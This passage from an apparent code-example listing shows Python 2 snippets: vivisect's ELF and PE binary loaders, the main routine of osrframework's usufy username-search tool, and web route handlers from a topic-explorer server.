    fname = vw.addFile(filename.lower(), baseaddr, fhash)

    strtabs = {}
    secnames = []
    for sec in elf.getSections():
        secnames.append(sec.getName())

    pgms = elf.getPheaders()
    secs = elf.getSections()

    for pgm in pgms:
        if pgm.p_type == Elf.PT_LOAD:
            if vw.verbose: vw.vprint('Loading: %s' % (repr(pgm)))
            bytez = elf.readAtOffset(pgm.p_offset, pgm.p_filesz)
            bytez += "\x00" * (pgm.p_memsz - pgm.p_filesz)
            pva = pgm.p_vaddr
            if addbase: pva += baseaddr
            vw.addMemoryMap(pva, pgm.p_flags & 0x7, fname, bytez) #FIXME perms
        else:
            if vw.verbose: vw.vprint('Skipping: %s' % repr(pgm))

    if len(pgms) == 0:
        # fall back to loading sections as best we can...
        if vw.verbose: vw.vprint('elf: no program headers found!')

        maps = [ [s.sh_offset,s.sh_size] for s in secs if s.sh_offset and s.sh_size ]
        maps.sort()

        merged = []
        for i in xrange(len(maps)):

            if merged and maps[i][0] == (merged[-1][0] + merged[-1][1]):
                merged[-1][1] += maps[i][1]
                continue

            merged.append( maps[i] )

        baseaddr = 0x05000000
        for offset,size in merged:
            bytez = elf.readAtOffset(offset,size)
            vw.addMemoryMap(baseaddr + offset, 0x7, fname, bytez)

        for sec in secs:
            if sec.sh_offset and sec.sh_size:
                sec.sh_addr = baseaddr + sec.sh_offset

    # First add all section definitions so we have them
    for sec in secs:
        sname = sec.getName()
        size = sec.sh_size
        if sec.sh_addr == 0:
            continue # Skip non-memory mapped sections

        sva = sec.sh_addr
        if addbase: sva += baseaddr

        vw.addSegment(sva, size, sname, fname)

    # Now trigger section specific analysis
    for sec in secs:
        #FIXME dup code here...
        sname = sec.getName()
        size = sec.sh_size
        if sec.sh_addr == 0:
            continue # Skip non-memory mapped sections

        sva = sec.sh_addr
        if addbase: sva += baseaddr

        if sname == ".interp":
            vw.makeString(sva)

        elif sname == ".init":
            vw.makeName(sva, "init_function", filelocal=True)
            vw.addEntryPoint(sva)

        elif sname == ".fini":
            vw.makeName(sva, "fini_function", filelocal=True)
            vw.addEntryPoint(sva)

        elif sname == ".dynamic": # Imports
            makeDynamicTable(vw, sva, sva+size)

        # FIXME section names are optional, use dynamic info from .dynamic
        elif sname == ".dynstr": # String table for dynamics
            makeStringTable(vw, sva, sva+size)

        elif sname == ".dynsym":
            #print "LINK",sec.sh_link
            for s in makeSymbolTable(vw, sva, sva+size):
                pass
                #print "########################.dynsym",s

        # If the section is really a string table, do it
        if sec.sh_type == Elf.SHT_STRTAB:
            makeStringTable(vw, sva, sva+size)

        elif sec.sh_type == Elf.SHT_SYMTAB:
            makeSymbolTable(vw, sva, sva+size)

        elif sec.sh_type == Elf.SHT_REL:
            makeRelocTable(vw, sva, sva+size, addbase, baseaddr)

        if sec.sh_flags & Elf.SHF_STRINGS:
            print "FIXME HANDLE SHF STRINGS"

    # Let pyelf do all the stupid string parsing...
    for r in elf.getRelocs():
        rtype = Elf.getRelocType(r.r_info)
        rlva = r.r_offset
        if addbase: rlva += baseaddr
        try:
            # If it has a name, it's an externally
            # resolved "import" entry, otherwise, just a regular reloc
            if arch in ('i386','amd64'):

                name = r.getName()
                if name:
                    if rtype == Elf.R_386_JMP_SLOT:
                        vw.makeImport(rlva, "*", name)

                    # FIXME elf has conflicting names for 2 relocs?
                    #elif rtype == Elf.R_386_GLOB_DAT:
                        #vw.makeImport(rlva, "*", name)

                    elif rtype == Elf.R_386_32:
                        pass

                    else:
                        vw.verbprint('unknown reloc type: %d %s (at %s)' % (rtype, name, hex(rlva)))

            if arch == 'arm':
                name = r.getName()
                if name:
                    if rtype == Elf.R_ARM_JUMP_SLOT:
                        vw.makeImport(rlva, "*", name)

                    else:
                        vw.verbprint('unknown reloc type: %d %s (at %s)' % (rtype, name, hex(rlva)))

        except vivisect.InvalidLocation, e:
            print "NOTE",e

    for s in elf.getDynSyms():
        stype = s.getInfoType()
        sva = s.st_value
        if sva == 0:
            continue
        if addbase: sva += baseaddr
        if sva == 0:
            continue

        if stype == Elf.STT_FUNC or (stype == Elf.STT_GNU_IFUNC and arch in ('i386','amd64')):   # HACK: linux is what we're really after.
            try:
                vw.addExport(sva, EXP_FUNCTION, s.name, fname)
                vw.addEntryPoint(sva)
            except Exception, e:
                vw.vprint('addExport Failure: %s' % e)

        elif stype == Elf.STT_OBJECT:
            if vw.isValidPointer(sva):
                try:
                    vw.addExport(sva, EXP_DATA, s.name, fname)
                except Exception, e:
                    vw.vprint('WARNING: %s' % e)

        elif stype == Elf.STT_HIOS:
            # So aparently Elf64 binaries on amd64 use HIOS and then
            # s.st_other cause that's what all the kewl kids are doing...
            sva = s.st_other
            if addbase: sva += baseaddr
            if vw.isValidPointer(sva):
                try:
                    vw.addExport(sva, EXP_FUNCTION, s.name, fname)
                    vw.addEntryPoint(sva)
                except Exception, e:
                    vw.vprint('WARNING: %s' % e)

        elif stype == 14:# OMG WTF FUCK ALL THIS NONSENSE! FIXME
            # So aparently Elf64 binaries on amd64 use HIOS and then
            # s.st_other cause that's what all the kewl kids are doing...
            sva = s.st_other
            if addbase: sva += baseaddr
            if vw.isValidPointer(sva):
                try:
                    vw.addExport(sva, EXP_DATA, s.name, fname)
                except Exception, e:
                    vw.vprint('WARNING: %s' % e)

        else:
            pass
            #print "DYNSYM DYNSYM",repr(s),s.getInfoType(),'other',hex(s.st_other)

    for d in elf.getDynamics():
        if d.d_tag == Elf.DT_NEEDED:
            name = d.getName()
            name = name.split('.')[0].lower()
            vw.addLibraryDependancy(name)
        else:
            pass
            #print "DYNAMIC DYNAMIC DYNAMIC",d


    for s in elf.getSymbols():
        sva = s.st_value
        if addbase: sva += baseaddr
        if vw.isValidPointer(sva) and len(s.name):
            try:
                vw.makeName(sva, s.name, filelocal=True)
            except Exception, e:
                print "WARNING:",e

    if vw.isValidPointer(elf.e_entry):
        vw.addExport(elf.e_entry, EXP_FUNCTION, '__entry', fname)
        vw.addEntryPoint(elf.e_entry)
        
    if vw.isValidPointer(baseaddr):
        vw.makeStructure(baseaddr, "elf.Elf32")

    return fname

Example 133

Project: osrframework
Source File: usufy.py
View license
def main(args):
    '''
        Main function. This function is created in this way so as to let other applications make use of the full configuration capabilities of the application.
    '''
    # Recovering the logger
    # Calling the logger when being imported
    osrframework.utils.logger.setupLogger(loggerName="osrframework.usufy", verbosity=args.verbose, logFolder=args.logfolder)
    # From now on, the logger can be recovered like this:
    logger = logging.getLogger("osrframework.usufy")
    # Printing the results if requested
    if not args.maltego:
        print banner.text

        sayingHello = """usufy.py Copyright (C) F. Brezo and Y. Rubio (i3visio) 2016
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it under certain conditions. For additional info, visit <http://www.gnu.org/licenses/gpl-3.0.txt>."""
        logger.info(sayingHello)
        print sayingHello
        print
        logger.info("Starting usufy.py...")

    if args.license:
        logger.info("Looking for the license...")
        # showing the license
        try:
            with open ("COPYING", "r") as iF:
                contenido = iF.read().splitlines()
                for linea in contenido:
                    print linea
        except Exception:
            try:
                # Trying to recover the COPYING file...
                with open ("/usr/share/osrframework/COPYING", "r") as iF:
                    contenido = iF.read().splitlines()
                    for linea in contenido:
                        print linea
            except:
                logger.error("ERROR: there has been an error when opening the COPYING file.\n\tThe file contains the terms of the GPLv3 under which this software is distributed.\n\tIn case of doubts, verify the integrity of the files or contact [email protected]")
    elif args.fuzz:
        logger.info("Performing the fuzzing tasks...")
        res = fuzzUsufy(args.fuzz, args.fuzz_config)
        logger.info("Recovered platforms:\n" + str(res))
    else:
        logger.debug("Recovering the list of platforms to be processed...")
        # Recovering the list of platforms to be launched
        listPlatforms = platform_selection.getPlatformsByName(platformNames=args.platforms, tags=args.tags, mode="usufy")
        logger.debug("Platforms recovered.")

        if args.info:
            # Information actions...
            if args.info == 'list_platforms':
                infoPlatforms="Listing the platforms:\n"
                for p in listPlatforms:
                    infoPlatforms += "\t\t" + (str(p) + ": ").ljust(16, ' ') + str(p.tags)+"\n"
                logger.info(infoPlatforms)
                return infoPlatforms
            elif args.info == 'list_tags':
                logger.info("Listing the tags:")
                tags = {}
                # Going through all the selected platforms to get their tags
                for p in listPlatforms:
                    for t in p.tags:
                        if t not in tags.keys():
                            tags[t] = 1
                        else:
                            tags[t] += 1
                infoTags = "List of tags:\n"
                # Displaying the results in a sorted list
                for t in tags.keys():
                    infoTags += "\t\t" + (t + ": ").ljust(16, ' ') + str(tags[t]) + "  time(s)\n"
                logger.info(infoTags)
                return infoTags
            else:
                pass

        # performing the test
        elif args.benchmark:
            logger.warning("The benchmark mode may last some minutes as it will be performing similar queries to the ones performed by the program in production. ")
            logger.info("Launching the benchmarking tests...")
            platforms = platform_selection.getAllPlatformNames("usufy")
            res = benchmark.doBenchmark(platforms)
            strTimes = ""
            for e in sorted(res.keys()):
                strTimes += str(e) + "\t" + str(res[e]) + "\n"
            logger.info(strTimes)
            return strTimes
        # Executing the corresponding process...
        else:
            # Showing the execution time...
            if not args.maltego:
                startTime= dt.datetime.now()
                print str(startTime) +"\tStarting search in " + str(len(listPlatforms)) + " platform(s)... Relax!\n"

            # Defining the list of users to monitor
            nicks = []
            logger.debug("Recovering nicknames to be processed...")
            if args.nicks:
                for n in args.nicks:
                    # TO-DO
                    #     A trick to avoid having the processing of the properties when being queried by Maltego
                    if "properties.i3visio" not in n:
                        nicks.append(n)
            else:
                # Reading the nick files
                try:
                    nicks = args.list.read().splitlines()
                except:
                    logger.error("ERROR: there has been an error when opening the file that stores the nicks.\tPlease, check the existence of this file.")

            # Definning the results
            res = []

            if args.output_folder != None:
                # if Verifying an output folder was selected
                logger.debug("Preparing the output folder...")
                if not args.maltego:
                    if not os.path.exists(args.output_folder):
                        logger.warning("The output folder \'" + args.output_folder + "\' does not exist. The system will try to create it.")
                        os.makedirs(args.output_folder)
                # Launching the process...
                try:
                    res = processNickList(nicks, listPlatforms, args.output_folder, avoidProcessing = args.avoid_processing, avoidDownload = args.avoid_download, nThreads=args.threads, verbosity= args.verbose, logFolder=args.logfolder)
                except Exception as e:
                    print "Exception grabbed when processing the nicks: " + str(e)
                    print traceback.print_stack()
            else:
                try:
                    res = processNickList(nicks, listPlatforms, nThreads=args.threads, verbosity= args.verbose, logFolder=args.logfolder)
                except Exception as e:
                    print "Exception grabbed when processing the nicks: " + str(e)
                    print traceback.print_stack()

            logger.info("Listing the results obtained...")
            # We are going to iterate over the results...
            strResults = "\t"

            # Structure returned
            """
            [
                {
                  "attributes": [
                    {
                      "attributes": [],
                      "type": "i3visio.uri",
                      "value": "http://twitter.com/i3visio"
                    },
                    {
                      "attributes": [],
                      "type": "i3visio.alias",
                      "value": "i3visio"
                    },
                    {
                      "attributes": [],
                      "type": "i3visio.platform",
                      "value": "Twitter"
                    }
                  ],
                  "type": "i3visio.profile",
                  "value": "Twitter - i3visio"
                }
                ,
                ...
            ]
            """
            for r in res:
                # The format of the results (attributes) for a given nick is a list as follows:

                for att in r["attributes"]:
                    # iterating through the attributes
                    platform = ""
                    uri = ""
                    for details in att["attributes"]:
                        if details["type"] == "i3visio.platform":
                            platform = details["value"]
                        if details["type"] == "i3visio.uri":
                            uri = details["value"]
                    try:
                        strResults+= (str(platform) + ":").ljust(16, ' ')+ " "+ str(uri)+"\n\t\t"
                    except:
                        pass

                logger.info(strResults)

            # Generating summary files for each ...
            if args.extension:
                # Storing the file...
                logger.info("Creating output files as requested.")
                if not args.maltego:
                    # Verifying if the outputPath exists
                    if not os.path.exists (args.output_folder):
                        logger.warning("The output folder \'" + args.output_folder + "\' does not exist. The system will try to create it.")
                        os.makedirs(args.output_folder)

                # Grabbing the results
                fileHeader = os.path.join(args.output_folder, args.file_header)

                # Iterating through the given extensions to print its values
                if not args.maltego:
                    for ext in args.extension:
                        # Generating output files
                        general.exportUsufy(res, ext, fileHeader)

            # Generating the Maltego output
            if args.maltego:
                general.listToMaltego(res)

            # Printing the results if requested
            if not args.maltego:
                print "A summary of the results obtained are shown in the following table:"
                #print res
                print unicode(general.usufyToTextExport(res))

                print

                if args.web_browser:
                    general.openResultsInBrowser(res)

                print "You can find all the information collected in the following files:"
                for ext in args.extension:
                    # Showing the output files
                    print "\t-" + fileHeader + "." + ext

            # Showing the execution time...
            if not args.maltego:
                print
                endTime= dt.datetime.now()
                print str(endTime) +"\tFinishing execution..."
                print
                print "Total time used:\t" + str(endTime-startTime)
                print "Average seconds/query:\t" + str((endTime-startTime).total_seconds()/len(listPlatforms)) +" seconds"
                print

            # Urging users to place an issue on Github...
            if not args.maltego:
                print
                print "Did something go wrong? Is a platform reporting false positives? Do you need to integrate a new one?"
                print "Then, place an issue in the Github project: <https://github.com/i3visio/osrframework/issues>."
                print "Note that otherwise, we won't know about it!"
                print

            return res

Example 134

Project: vivisect
Source File: pe.py
View license
def loadPeIntoWorkspace(vw, pe, filename=None):

    mach = pe.IMAGE_NT_HEADERS.FileHeader.Machine

    arch = arch_names.get(mach)
    if arch == None:
        raise Exception("Machine %.4x is not supported for PE!" % mach )

    vw.setMeta('Architecture', arch)
    vw.setMeta('Format', 'pe')

    platform = 'windows'

    # Drivers are platform "winkern" so impapi etc works
    subsys = pe.IMAGE_NT_HEADERS.OptionalHeader.Subsystem
    if subsys == PE.IMAGE_SUBSYSTEM_NATIVE:
        platform = 'winkern'

    vw.setMeta('Platform', platform)

    defcall = defcalls.get(arch)
    if defcall:
        vw.setMeta("DefaultCall", defcall)

    # Set ourselvs up for extended windows binary analysis

    baseaddr = pe.IMAGE_NT_HEADERS.OptionalHeader.ImageBase
    entry = pe.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint + baseaddr
    entryrva = entry - baseaddr

    codebase = pe.IMAGE_NT_HEADERS.OptionalHeader.BaseOfCode
    codesize = pe.IMAGE_NT_HEADERS.OptionalHeader.SizeOfCode
    codervamax = codebase+codesize

    fvivname = filename

    # This will help linkers with files that are re-named
    dllname = pe.getDllName()
    if dllname != None:
        fvivname = dllname

    if fvivname == None:
        fvivname = "pe_%.8x" % baseaddr

    fhash = "unknown hash"
    if os.path.exists(filename):
        fhash = v_parsers.md5File(filename)

    fname = vw.addFile(fvivname.lower(), baseaddr, fhash)

    symhash = e_symcache.symCacheHashFromPe(pe)
    vw.setFileMeta(fname, 'SymbolCacheHash', symhash)

    # Add file version info if VS_VERSIONINFO has it
    vs = pe.getVS_VERSIONINFO()
    if vs != None:
        vsver = vs.getVersionValue('FileVersion')
        if vsver != None and len(vsver):
            # add check to split seeing samples with spaces and nothing else..
            parts = vsver.split()
            if len(parts):
                vsver = vsver.split()[0]
                vw.setFileMeta(fname, 'Version', vsver)

    # Setup some va sets used by windows analysis modules
    vw.addVaSet("Library Loads", (("Address", VASET_ADDRESS),("Library", VASET_STRING)))
    vw.addVaSet('pe:ordinals', (('Address', VASET_ADDRESS),('Ordinal',VASET_INTEGER)))

    # SizeOfHeaders spoofable...
    curr_offset = pe.IMAGE_DOS_HEADER.e_lfanew + len(pe.IMAGE_NT_HEADERS) 
    
    secsize = len(vstruct.getStructure("pe.IMAGE_SECTION_HEADER"))
    
    sec_offset = pe.IMAGE_DOS_HEADER.e_lfanew + 4 + len(pe.IMAGE_NT_HEADERS.FileHeader) +  pe.IMAGE_NT_HEADERS.FileHeader.SizeOfOptionalHeader 
    
    if sec_offset != curr_offset:
        header_size = sec_offset + pe.IMAGE_NT_HEADERS.FileHeader.NumberOfSections * secsize
    else:
        header_size = pe.IMAGE_DOS_HEADER.e_lfanew + len(pe.IMAGE_NT_HEADERS) + pe.IMAGE_NT_HEADERS.FileHeader.NumberOfSections * secsize

    # Add the first page mapped in from the PE header.
    header = pe.readAtOffset(0, header_size)


    secalign = pe.IMAGE_NT_HEADERS.OptionalHeader.SectionAlignment

    subsys_majver = pe.IMAGE_NT_HEADERS.OptionalHeader.MajorSubsystemVersion
    subsys_minver = pe.IMAGE_NT_HEADERS.OptionalHeader.MinorSubsystemVersion

    secrem = len(header) % secalign
    if secrem != 0:
        header += "\x00" * (secalign - secrem)

    vw.addMemoryMap(baseaddr, e_mem.MM_READ, fname, header)
    vw.addSegment(baseaddr, len(header), "PE_Header", fname)

    hstruct = vw.makeStructure(baseaddr, "pe.IMAGE_DOS_HEADER")
    magicaddr = hstruct.e_lfanew
    if vw.readMemory(baseaddr + magicaddr, 2) != "PE":
        raise Exception("We only support PE exe's")

    if not vw.isLocation( baseaddr + magicaddr ):
        padloc = vw.makePad(baseaddr + magicaddr, 4)

    ifhdr_va = baseaddr + magicaddr + 4
    ifstruct = vw.makeStructure(ifhdr_va, "pe.IMAGE_FILE_HEADER")

    vw.makeStructure(ifhdr_va + len(ifstruct), "pe.IMAGE_OPTIONAL_HEADER")

    # get resource data directory
    ddir = pe.getDataDirectory(PE.IMAGE_DIRECTORY_ENTRY_RESOURCE)
    loadrsrc = vw.config.viv.parsers.pe.loadresources
    carvepes = vw.config.viv.parsers.pe.carvepes

    deaddirs = [PE.IMAGE_DIRECTORY_ENTRY_EXPORT,
                PE.IMAGE_DIRECTORY_ENTRY_IMPORT,
                PE.IMAGE_DIRECTORY_ENTRY_RESOURCE,
                PE.IMAGE_DIRECTORY_ENTRY_EXCEPTION,
                PE.IMAGE_DIRECTORY_ENTRY_SECURITY,
                PE.IMAGE_DIRECTORY_ENTRY_BASERELOC,
                PE.IMAGE_DIRECTORY_ENTRY_DEBUG,
                PE.IMAGE_DIRECTORY_ENTRY_COPYRIGHT,
                PE.IMAGE_DIRECTORY_ENTRY_ARCHITECTURE,
                PE.IMAGE_DIRECTORY_ENTRY_GLOBALPTR,
                PE.IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG,
                PE.IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT,
                PE.IMAGE_DIRECTORY_ENTRY_IAT,
                PE.IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT,
                PE.IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR]
    deadvas = [ddir.VirtualAddress]
    for datadir in deaddirs:
        d = pe.getDataDirectory(datadir)
        if d.VirtualAddress:
            deadvas.append(d.VirtualAddress)

    for idx, sec in enumerate(pe.sections):
        mapflags = 0

        chars = sec.Characteristics
        if chars & PE.IMAGE_SCN_MEM_READ:
            mapflags |= e_mem.MM_READ

            isrsrc = ( sec.VirtualAddress == ddir.VirtualAddress )
            if isrsrc and not loadrsrc:
                continue

            # If it's for an older system, just about anything
            # is executable...
            if not vw.config.viv.parsers.pe.nx and subsys_majver < 6 and not isrsrc:
                mapflags |= e_mem.MM_EXEC

        if chars & PE.IMAGE_SCN_MEM_READ:
            mapflags |= e_mem.MM_READ
        if chars & PE.IMAGE_SCN_MEM_WRITE:
            mapflags |= e_mem.MM_WRITE
        if chars & PE.IMAGE_SCN_MEM_EXECUTE:
            mapflags |= e_mem.MM_EXEC
        if chars & PE.IMAGE_SCN_CNT_CODE:
            mapflags |= e_mem.MM_EXEC


        secrva = sec.VirtualAddress
        secvsize = sec.VirtualSize
        secfsize = sec.SizeOfRawData
        secbase = secrva + baseaddr
        secname = sec.Name.strip("\x00")
        secrvamax = secrva + secvsize
    
        # If the section is part of BaseOfCode->SizeOfCode
        # force execute perms...
        if secrva >= codebase and secrva < codervamax:
            mapflags |= e_mem.MM_EXEC

        # If the entry point is in this section, force execute
        # permissions.
        if secrva <= entryrva and entryrva < secrvamax:
            mapflags |= e_mem.MM_EXEC

        if not vw.config.viv.parsers.pe.nx and subsys_majver < 6 and mapflags & e_mem.MM_READ:
            mapflags |= e_mem.MM_EXEC

        if sec.VirtualSize == 0 or sec.SizeOfRawData == 0:
            if idx+1 >= len(pe.sections):
                continue
            # fill the gap with null bytes.. 
            nsec = pe.sections[idx+1] 
            nbase = nsec.VirtualAddress + baseaddr

            plen = nbase - secbase 
            readsize = sec.SizeOfRawData if sec.SizeOfRawData < sec.VirtualSize else sec.VirtualSize
            secoff = pe.rvaToOffset(secrva)
            secbytes = pe.readAtOffset(secoff, readsize)
            secbytes += "\x00" * plen
            vw.addMemoryMap(secbase, mapflags, fname, secbytes)
            vw.addSegment(secbase, len(secbytes), secname, fname)

            # Mark dead data on resource and import data directories
            if sec.VirtualAddress in deadvas:
                vw.markDeadData(secbase, secbase+len(secbytes))

            #FIXME create a mask for this
            if not (chars & PE.IMAGE_SCN_CNT_CODE) and not (chars & PE.IMAGE_SCN_MEM_EXECUTE) and not (chars & PE.IMAGE_SCN_MEM_WRITE):
                vw.markDeadData(secbase, secbase+len(secbytes))
            continue
        
        # if SizeOfRawData is greater than VirtualSize we'll end up using VS in our read..
        if sec.SizeOfRawData < sec.VirtualSize:
            if sec.SizeOfRawData > pe.filesize: 
                continue
    
        plen = sec.VirtualSize - sec.SizeOfRawData          
    
        try:
            # According to http://code.google.com/p/corkami/wiki/PE#section_table if SizeOfRawData is larger than VirtualSize, VS is used..
            readsize = sec.SizeOfRawData if sec.SizeOfRawData < sec.VirtualSize else sec.VirtualSize

            secoff = pe.rvaToOffset(secrva)
            secbytes = pe.readAtOffset(secoff, readsize)
            secbytes += "\x00" * plen
            vw.addMemoryMap(secbase, mapflags, fname, secbytes)
            vw.addSegment(secbase, len(secbytes), secname, fname)

            # Mark dead data on resource and import data directories
            if sec.VirtualAddress in deadvas:
                vw.markDeadData(secbase, secbase+len(secbytes))

            #FIXME create a mask for this
            if not (chars & PE.IMAGE_SCN_CNT_CODE) and not (chars & PE.IMAGE_SCN_MEM_EXECUTE) and not (chars & PE.IMAGE_SCN_MEM_WRITE):
                vw.markDeadData(secbase, secbase+len(secbytes))

        except Exception, e:
            print("Error Loading Section (%s size:%d rva:%.8x offset: %d): %s" % (secname,secfsize,secrva,secoff,e))

    vw.addExport(entry, EXP_FUNCTION, '__entry', fname)
    vw.addEntryPoint(entry)

    # store the actual reloc section virtual address
    reloc_va = pe.getDataDirectory(PE.IMAGE_DIRECTORY_ENTRY_BASERELOC).VirtualAddress
    if reloc_va:
        reloc_va += baseaddr
    vw.setFileMeta(fname, "reloc_va", reloc_va)

    for rva,rtype in pe.getRelocations():

        # map PE reloc to VIV reloc ( or dont... )
        vtype = relmap.get(rtype)
        if vtype == None:
            continue

        vw.addRelocation(rva+baseaddr, vtype)

    for rva, lname, iname in pe.getImports():
        if vw.probeMemory(rva+baseaddr, 4, e_mem.MM_READ):
            vw.makeImport(rva+baseaddr, lname, iname)

    # Tell vivisect about ntdll functions that don't exit...
    vw.addNoReturnApi("ntdll.RtlExitUserThread")
    vw.addNoReturnApi("kernel32.ExitProcess")
    vw.addNoReturnApi("kernel32.ExitThread")
    vw.addNoReturnApi("kernel32.FatalExit")
    vw.addNoReturnApiRegex("^msvcr.*\._CxxThrowException$")
    vw.addNoReturnApiRegex("^msvcr.*\.abort$")
    vw.addNoReturnApi("ntoskrnl.KeBugCheckEx")

    exports = pe.getExports()
    for rva, ord, name in exports:
        eva = rva + baseaddr
        try:
            vw.setVaSetRow('pe:ordinals', (eva,ord))
            vw.addExport(eva, EXP_UNTYPED, name, fname)
            if vw.probeMemory(eva, 1, e_mem.MM_EXEC):
                vw.addEntryPoint(eva)
        except Exception, e:
            vw.vprint('addExport Failed: %s.%s (0x%.8x): %s' % (fname,name,eva,e))

    # Save off the ordinals...
    vw.setFileMeta(fname, 'ordinals', exports)

    fwds = pe.getForwarders()
    for rva, name, forwardname in fwds:
        vw.makeName(rva+baseaddr, "forwarder_%s.%s" % (fname, name))
        vw.makeString(rva+baseaddr)

    vw.setFileMeta(fname, 'forwarders', fwds)

    # Check For SafeSEH list...
    if pe.IMAGE_LOAD_CONFIG != None:

        vw.setFileMeta(fname, "SafeSEH", True)

        va = pe.IMAGE_LOAD_CONFIG.SEHandlerTable
        if va != 0:
            vw.makeName(va, "%s.SEHandlerTable" % fname)
            count = pe.IMAGE_LOAD_CONFIG.SEHandlerCount
            # RP BUG FIX - sanity check the count
            if count * 4 < pe.filesize and vw.isValidPointer(va):
                # XXX - CHEAP HACK for some reason we have binaries still thorwing issues.. 
                
                try:
                    # Just cheat and use the workspace with memory maps in it already
                    for h in vw.readMemoryFormat(va, "<%dP" % count):
                        sehva = baseaddr + h
                        vw.addEntryPoint(sehva)
                        #vw.hintFunction(sehva, meta={'SafeSEH':True})
                except:
                    vw.vprint("SEHandlerTable parse error")

    # Last but not least, see if we have symbol support and use it if we do
    if vt_win32.dbghelp:

        s = vt_win32.Win32SymbolParser(-1, filename, baseaddr)

        # We don't want exports or whatever because we already have them
        s.symopts |= vt_win32.SYMOPT_EXACT_SYMBOLS
        s.parse()

        # Add names for any symbols which are missing them
        for symname, symva, size, flags in s.symbols:

            if not vw.isValidPointer(symva):
                continue

            try:

                if vw.getName(symva) == None:
                    vw.makeName(symva, symname, filelocal=True)

            except Exception, e:
                vw.vprint("Symbol Load Error: %s" % e)

        # Also, lets set the locals/args name hints if we found any
        vw.setFileMeta(fname, 'PELocalHints', s._sym_locals)

    # if it has an EXCEPTION directory parse if it has the pdata
    edir = pe.getDataDirectory(PE.IMAGE_DIRECTORY_ENTRY_EXCEPTION)
    if edir.VirtualAddress and arch == 'amd64':
        va = edir.VirtualAddress + baseaddr
        vamax = va + edir.Size
        while va < vamax:
            f = vw.makeStructure(va, 'pe.IMAGE_RUNTIME_FUNCTION_ENTRY')
            if not vw.isValidPointer(baseaddr + f.UnwindInfoAddress):
                break

            # FIXME UNWIND_INFO *requires* DWORD alignment, how is it enforced?
            fva = f.BeginAddress + baseaddr
            uiva = baseaddr + f.UnwindInfoAddress
            # Possible method 1...
            #uiva = baseaddr + (f.UnwindInfoAddress & 0xfffffffc )

            # Possible method 2...
            #uirem = f.UnwindInfoAddress % 4
            #if uirem:
                #uiva += ( 4 - uirem )
            uinfo = vw.getStructure(uiva, 'pe.UNWIND_INFO')
            ver = uinfo.VerFlags & 0x7
            if ver != 1:
                vw.vprint('Unwind Info Version: %d (bailing on .pdata)' % ver)
                break

            flags = uinfo.VerFlags >> 3
            # Check if it's a function *block* rather than a function *entry*
            if not (flags & PE.UNW_FLAG_CHAININFO):
                vw.addEntryPoint(fva)

            va += len(f)

    # auto-mark embedded PEs as "dead data" to prevent code flow...
    if carvepes: 
        pe.fd.seek(0)
        fbytes = pe.fd.read()
        for offset, i in pe_carve.carve(fbytes, 1):
            # Found a sub-pe!
            subpe = pe_carve.CarvedPE(fbytes, offset, chr(i))
            pebytes = subpe.readAtOffset(0, subpe.getFileSize())
            rva = pe.offsetToRva(offset)
            vw.markDeadData(rva, rva+len(pebytes))

    return fname

Example 135

Project: topic-explorer
Source File: server.py
View license
    def _setup_routes(self, **kwargs):
        @self.route('/<k:int>/doc_topics/<doc_id>')
        @_set_acao_headers
        def doc_topic_csv(k, doc_id):
            response.content_type = 'text/csv; charset=UTF8'

            doc_id = unquote(doc_id)

            data = self.v[k].doc_topics(doc_id)

            output = StringIO()
            writer = csv.writer(output)
            writer.writerow(['topic', 'prob'])
            writer.writerows([(t, "%6f" % p) for t, p in data])

            return output.getvalue()

        @self.route('/<k:int>/docs/<doc_id>')
        @_set_acao_headers
        def doc_csv(k, doc_id, threshold=0.2):
            response.content_type = 'text/csv; charset=UTF8'

            doc_id = unquote(doc_id)

            data = self.v[k].dist_doc_doc(doc_id)

            output = StringIO()
            writer = csv.writer(output)
            writer.writerow(['doc', 'prob'])
            writer.writerows([(d, "%6f" % p) for d, p in data if p > threshold])

            return output.getvalue()

        @self.route('/<k:int>/topics/<topic_no:int>.json')
        @_set_acao_headers
        def topic_json(k, topic_no, N=40):
            response.content_type = 'application/json; charset=UTF8'
            try:
                N = int(request.query.n)
            except:
                pass

            if N > 0:
                data = self.v[k].dist_top_doc([topic_no])[:N]
            else:
                data = self.v[k].dist_top_doc([topic_no])[N:]
                data = reversed(data)

            docs = [doc for doc, prob in data]
            doc_topics_mat = self.v[k].doc_topics(docs)
            docs = self.get_docs(docs, id_as_key=True)

            js = []
            for doc_prob, topics in zip(data, doc_topics_mat):
                doc, prob = doc_prob
                struct = docs[doc]
                struct.update({'prob': 1 - prob,
                               'topics': dict([(str(t), float(p)) for t, p in topics])})
                js.append(struct)

            return json.dumps(js)

        @self.route('/<k:int>/docs_topics/<doc_id:path>.json')
        @_set_acao_headers
        def doc_topics(k, doc_id, N=40):
            try:
                N = int(request.query.n)
            except:
                pass

            doc_id = unquote(doc_id)

            response.content_type = 'application/json; charset=UTF8'

            if N > 0:
                data = self.v[k].dist_doc_doc(doc_id)[:N]
            else:
                data = self.v[k].dist_doc_doc(doc_id)[N:]
                data = reversed(data)

            docs = [doc for doc, prob in data]
            doc_topics_mat = self.v[k].doc_topics(docs)
            docs = self.get_docs(docs, id_as_key=True)

            js = []
            for doc_prob, topics in zip(data, doc_topics_mat):
                doc, prob = doc_prob
                struct = docs[doc]
                struct.update({'prob': 1 - prob,
                               'topics': dict([(str(t), float(p)) for t, p in topics])})
                js.append(struct)

            return json.dumps(js)

        @self.route('/<k:int>/word_docs.json')
        @_set_acao_headers
        def word_docs(k, N=40):
            try:
                N = int(request.query.n)
            except:
                pass
            try:
                query = request.query.q.lower().split('|')
            except:
                raise Exception('Must specify a query')

            response.content_type = 'application/json; charset=UTF8'

            query = [word for word in query if word in self.c.words]

            # abort if there are no terms in the query
            if not query:
                response.status = 400  # Bad Request
                return "Search terms not in model"

            topics = self.v[k].dist_word_top(query, show_topics=False)
            data = self.v[k].dist_top_doc(topics['i'],
                                          weights=(topics['value'].max() - topics['value']))

            if N > 0:
                data = data[:N]
            else:
                data = data[N:]
                data = reversed(data)

            docs = [doc for doc, prob in data]
            doc_topics_mat = self.v[k].doc_topics(docs)
            docs = self.get_docs(docs, id_as_key=True)

            js = []
            for doc_prob, topics in zip(data, doc_topics_mat):
                doc, prob = doc_prob
                struct = docs[doc]
                struct.update({'prob': 1 - prob,
